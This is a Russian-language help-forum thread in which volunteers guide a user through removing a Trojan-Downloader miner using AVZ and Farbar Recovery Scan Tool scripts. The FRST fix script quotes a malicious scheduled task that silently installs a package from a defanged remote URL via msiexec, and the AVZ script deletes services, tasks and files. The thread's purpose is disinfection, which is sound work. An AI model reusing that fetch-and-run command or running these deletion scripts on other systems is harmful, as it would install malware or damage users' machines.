Не удаляется HEUR:Trojan-Downloader.Win32.Miner.gen, стоит KES 11 .
При попытке удалить, после перезагрузки вновь всплывает окно Касперского с этим вирусом.
Printable View
Не удаляется HEUR:Trojan-Downloader.Win32.Miner.gen, стоит KES 11 .
При попытке удалить, после перезагрузки вновь всплывает окно Касперского с этим вирусом.
Уважаемый(ая) [B]RusL1k[/B], спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Выполните скрипт в AVZ из папки Autologger
[code]begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
DeleteService('Starter Check');
DeleteSchedulerTask('{8ED139AD-2318-953A-9D44-3DEA7CEB2B1A}');
DeleteSchedulerTask('{CA5CBAA3-69ED-2906-FA9D-0D79F23F1850}');
DeleteFile('C:\ProgramData\WindowsMenu\enplus.exe','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.[/code][list][*]Обратите внимание: будет выполнена [b]перезагрузка компьютера[/b].[/list]
[b][color="Red"]Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. [/color][/b]
Выполнено.
Так же приложил скрин всплывающего окна KES при включении ПК
Скачайте [url=https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]https://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[list][*][b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.[/list]
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.
2. Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]List BCD[/i], [i]Driver MD5[/i] и [i]90 Days Files[/i].
[img]https://i.imgur.com/3munStB.png[/img]
3. Нажмите кнопку [b]Scan[/b].
4. После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет ([b]Addition.txt[/b]).
6. Файлы [b]FRST.txt[/b] и [b]Addition.txt[/b] заархивируйте (в [b]один общий архив[/b]) и прикрепите к сообщению.
Готово
1. Выделите следующий код:
[code]
Start::
CreateRestorePoint:
2019-03-05 20:37 - 2019-03-10 04:14 - 000000004 _____ C:\Users\Все пользователи\lock.dat
2019-03-05 20:37 - 2019-03-10 04:14 - 000000004 _____ C:\ProgramData\lock.dat
2019-03-05 20:37 - 2019-03-05 20:37 - 000000008 _____ C:\Users\Все пользователи\ts.dat
2019-03-05 20:37 - 2019-03-05 20:37 - 000000008 _____ C:\ProgramData\ts.dat
2019-03-05 20:35 - 2019-03-05 20:35 - 000000011 _____ C:\Users\cits_ams2\setup24.ini
2019-03-05 20:35 - 2019-03-05 20:35 - 000000009 _____ C:\Users\cits_ams2\rstr4.ini
2019-03-05 20:31 - 2019-03-28 10:13 - 000000000 ____D C:\Program Files (x86)\FastDataX
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\cits_ams2\uUEXIJEUOqe.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\uIAkWUdYr.exe
C:\Temp\ImagingEngine.dll
Task: {1D46EFB5-4632-4318-ACB8-3FF5260CC823} - System32\Tasks\{CA5CBAA3-69ED-2906-FA9D-0D79F23F1850} => "msiexec.exe" -q /package hxxps://refreshnerer711rb.info/kPIJ9cEuj0.1kX <==== ATTENTION
Task: {9CE436B4-6B88-43FF-A318-70AFA4009447} - \Microsoft\Windows\Starter -> No File <==== ATTENTION
Task: {B1999299-AEE6-4EEF-B2F5-9919F27C8247} - \{4CD234A0-F3A6-49FD-8A8F-FDC06573A810} -> No File <==== ATTENTION
Task: {B6C43FF2-54A0-445A-A405-1046C341140C} - \Microsoft\QuickLaunch -> No File <==== ATTENTION
Reboot:
End::
[/code]
2. Скопируйте выделенный текст ([b]правая кнопка мыши[/b] – [b]Копировать[/b]).
3. Запустите [b]Farbar Recovery Scan Tool[/b].
4. Нажмите один раз на кнопку [b]Fix[/b] и подождите. Программа создаст лог-файл ([b]Fixlog.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.
[list][*]Обратите внимание: будет выполнена [b]перезагрузка компьютера[/b].[/list]
Готово
Что с проблемой?
Вроде бы все ок.
Спасибо.